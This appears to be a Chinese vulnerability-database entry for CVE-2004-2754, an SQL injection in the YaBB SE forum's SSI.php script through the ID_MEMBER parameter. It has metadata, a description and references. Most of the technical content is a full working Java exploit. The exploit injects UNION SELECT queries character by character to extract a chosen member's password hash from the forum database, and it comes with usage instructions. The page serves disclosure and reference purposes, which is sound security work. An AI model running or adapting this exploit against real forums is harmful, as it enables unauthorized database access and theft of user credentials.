YABB SE SSI.php ID_MEMBER参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107634 漏洞类型 SQL注入
发布时间 2004-01-19 更新时间 2004-12-31
CVE编号 CVE-2004-2754 CNNVD-ID CNNVD-200412-200
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23554
https://cxsecurity.com/issue/WLB-2007110045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-200
|漏洞详情
YabbSe是一款基于PHP/MySQL的论坛程序。YabbSe包含的SSI.php没有充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或修改数据库。SSI.php文件返回一些论坛最近论题,版面统计等一些信息,由于对ID_MEMBER参数缺少充分的过滤,攻击者可以提交恶意SQL命令,更改原有数据库逻辑,获得敏感信息或修改数据库。
|漏洞EXP
source: http://www.securityfocus.com/bid/9449/info

A problem with YaBB SE could make it possible for a remote user launch SQL injection attacks.

It has been reported that a problem exists in the SSI.php script distributed as part of YaBB SE. Due to insufficient sanitizing of user-supplied URI parameters, it is possible for a remote user to inject arbitrary SQL queries into the database used by YaBB SE. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

/*
* YabbSe SQL Injection test code
* The code is very ugly but it works OK
* Use at your own risk.
* compile:
* javac yabb.java
* exec:
* java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
* parameters are:
* java yabb [url with path] [database_prefix] [ID_MEMBER]
*/
import java.net.*;
import java.io.*;

public class yabb {
    public static void main(String[] args) throws Exception {

 boolean lastChar = false;
 String Key = "";

        for ( int count=1; count <= 32 ; count++)
        {
  URL yabbForum = new URL(args[0] +
"SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP
%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20
%20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*");

  BufferedReader in = new BufferedReader(new
InputStreamReader(yabbForum.openStream()));

  String inputLine;

  inputLine = in.readLine();

  int pos  = inputLine.indexOf("action=im");
  int pos2 = inputLine.indexOf(" ", pos + 11);

  if ( pos < 0 )
  {
   System.out.println("ERROR: The server doesn't return any data");
   System.exit(0);
  }

  String theNumber = inputLine.substring( pos + 11, pos2);

  System.out.println(theNumber + "-" + new
Character((char)Integer.parseInt(theNumber.trim())).toString());
  Key += new Character((char)Integer.parseInt(theNumber.trim())).toString();
  in.close();
 }
 System.out.println("Hashed password : " + Key);
    }
}
|参考资料

来源:BID
名称:9449
链接:http://www.securityfocus.com/bid/9449
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=210608&group_id=57105
来源:www.yabbse.org
链接:http://www.yabbse.org/community/index.php?thread=27122
来源:SECTRACK
名称:1008764
链接:http://www.securitytracker.com/id?1008764
来源:BUGTRAQ
名称:20040119YabbSESQLInjection
链接:http://www.securityfocus.com/archive/1/350244
来源:OSVDB
名称:3618
链接:http://www.osvdb.org/3618
来源:SREASON
名称:3371
链接:http://securityreason.com/securityalert/3371
来源:NSFOCUS
名称:5956
链接:http://www.nsfocus.net/vulndb/5956